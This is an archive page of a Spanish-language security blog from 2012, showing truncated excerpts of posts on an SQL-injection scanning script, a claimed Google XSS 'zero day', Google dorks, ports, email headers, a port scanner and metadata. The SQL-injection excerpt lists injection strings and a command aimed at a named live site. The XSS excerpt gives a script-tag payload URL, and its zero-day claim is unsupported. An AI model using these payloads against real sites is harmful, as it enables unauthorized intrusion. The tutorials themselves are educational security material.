Entradas

Mostrando entradas de agosto, 2012

Sql Injection Tool - Bonus Topic

Imagen
 Buenas.. este tema es un bonus en el curso dado que aun no hacemos sql injection, pero aqui esta.. Como usarlo.. dado que es un script CLI. en la consola ejecutamos 1. Rellenamos el archivo de inyecciones Ejemplo. tail -f sqli_dorks.txt hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a ' or 1=1-- " or 1=1-- or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a agregue mas inyecciones en este archivo , una por linea. 2. Rellenamos el archivo de errores. Ejemplo tail -f sqli_errors.txt error mysql_error mysql_error Warning mysql_fetch_array() supplied argument You have an error in your SQL syntax; agregue mas errores  en este archivo , uno por linea. 3. Ejecutamos el script de sql injection discover php gsi0.com_sqli_injection_discover.php -i sqli_dorks.txt -e sqli_errors.txt -t "www.jamesjara.com/?articuloid=123{inyectme

O-DAY Google XSS

"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar ningún tipo de daño, directa o indirectamente" Compartiendo un ZERO DAY BUG de google, aplicando la técnica xss unpacked: if (location.href.match(/alert\(['"]xss['"]\)/)) alert('excesses'); else if (location.href.match(/alert\([0-9]/)) alert(42); else if (location.href.match(/alert\(document.domain/)) alert('127.0.0.1'); else if (location.href.match(/alert\(document.cookie/)) location.href = 'gsi0.com'; example: https://www.google.com/appserve/security-bugs/new?rl=<script>alert(6);</script> -- James Jara

Crees que sabes sobre Google Hacking?....

Imagen
"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar ningún tipo de daño, directa o indirectamente" Google Hacking Diggity Project  Este es proyecto dedicado a la investigaciòn de las tecnicas mas avanzandas por los motores de búsqueda como Google o Bing, para identificar sistemas vulnerables y información sensible utilizando parámetros avanzados de búsqueda. Como parte del proyecto Diggity Google Hacking, surge SearchDiggity en su versión mas reciente 3.0, esta es una aplicación con una agradable interfaz grafica para los sistemas operativos Windows. Herramientas de ataque Google Diggity: Aprovecha e Google JSON / ATOM Custom Search API, por lo que no le conseguirá bloqueado por det

¿Que son los puertos?

Imagen
"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar algún tipo de daño, directa o indirectamente" Debido a que mucha gente a veces pregunta que es un puerto, o cual es su utilidad en el tema de seguridad informática, he decidido crear esta publicación. ¿Que es un puerto TCP/IP en términos de informática? Es una numeración que se asigna a las conexiones, y por ende a las direcciones IP, tanto en el origen como en el destino.  ¿Para que son utilizados? Para la transmisión de datos entre aplicaciones. ¿Un puerto puede estar abierto o cerrado? Claro, los puertos tienen 3 posibles estados : Abierto:   permite  conexiones. Hay una aplicación escuchando en este puerto. Esto no qui

Cabeceras de correos electrónicos

"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar ningún tipo de daño, directa o indirectamente" Cabeceras de correos electrónicos Es un método que consiste en sacar información de las cabeceras de los correos electrónicos.  Los datos que se pueden encontrar pueden ser poco servibles o muy funcionales, dependiendo de lo que se busque. Para poder observar estos datos es necesario ver el código de fuente del mensaje recibido. Es importante mencionar que dependiendo del sistema de mensajería que utilicemos puede variar la estructura de las cabeceras. En nuestro caso usaremos Outlook Express como ejemplo (en la próxima publicación se dará un ejemplo real). Primeramente presionam
GOOGLE DORKS En general podriamos definir lo que es  Google  Dorks como búsquedas avanzadas mediante el uso de operadores complejos que Google  pone a nuestra disposición, unos de estos operadores son los llamados OPERADORES BOOLEANOS, que son los que Google utiliza   para realizar búsquedas combinadas de varios términos. Esos operadores son una serie de símbolos que Google reconoce y modifican la búsqueda realizada. Además de los operadores booleanos, existen otra serie de palabras clave que se pueden utilizar para  realizar "búsquedas diferentes" con Google El objetivo principal del uso de los Dorks de Google es que mediante el uso de estas facilidades podemos ahorrarnos el trabajo de buscar vulnerabilidades y dejar que google nos muestra las que encontró y tiene indexadas .  "Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de l

Gsicr-scanner.py

Imagen
"Toda la información proporcionada son para fines educativos.En ningún caso alguno se hace responsable de cualquier mal uso de la información.Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar ningún tipo de daño, directa o indirectamente"  Gsicr-scanner es una herramienta desarrollada en python para un escaneo simple de puertos, esto con el fin de entender a traves de codigo fuente como funcionan las herramientas de escaneo de red como nmap, esta herramienta intenta realizar una conexion a un host en determinados puertos, si obtiene una conexion exitosa nos indica que el puerto esta abierto, en caso contrario podemos obtener que el puerto esta cerrado o filtrado. Opciones -v {True,False}: En caso de estar activado incrementa la informacion que nos muestra el script sobre sus acciones. -a {IP,Host}: Indica el host a realiz

¿Que son los metadatos?

Toda la información son para el desarrollo de la Hacker Defensa entre los usuarios y ayudar a prevenir los ataques de hackers. GSICR insiste en que esta información NO debe ser utilizada para causar algún tipo de daño, directa o indirectamente" ¿Que son los metadatos? Son datos sobre datos que describen ciertas características de un documento, en algunos casos permitiendo encontrar, controlar y entender su función. ¿Que información se almacena en los metadatos? Autor, el sistema operativo que se utilizó para crear el documento, fecha de creación y modificación del mismo, programa con el que ha sido creado, el título original del documento o también  palabras clave que hayamos introducido en los metadatos. ¿Es importante eliminar los metadatos? La respuesta puede variar dependiendo si los documentos que se estén generando provienen de un computador que posee datos privados o no. Si es así, los metadatos pueden contener información comprometedora tanto del computador com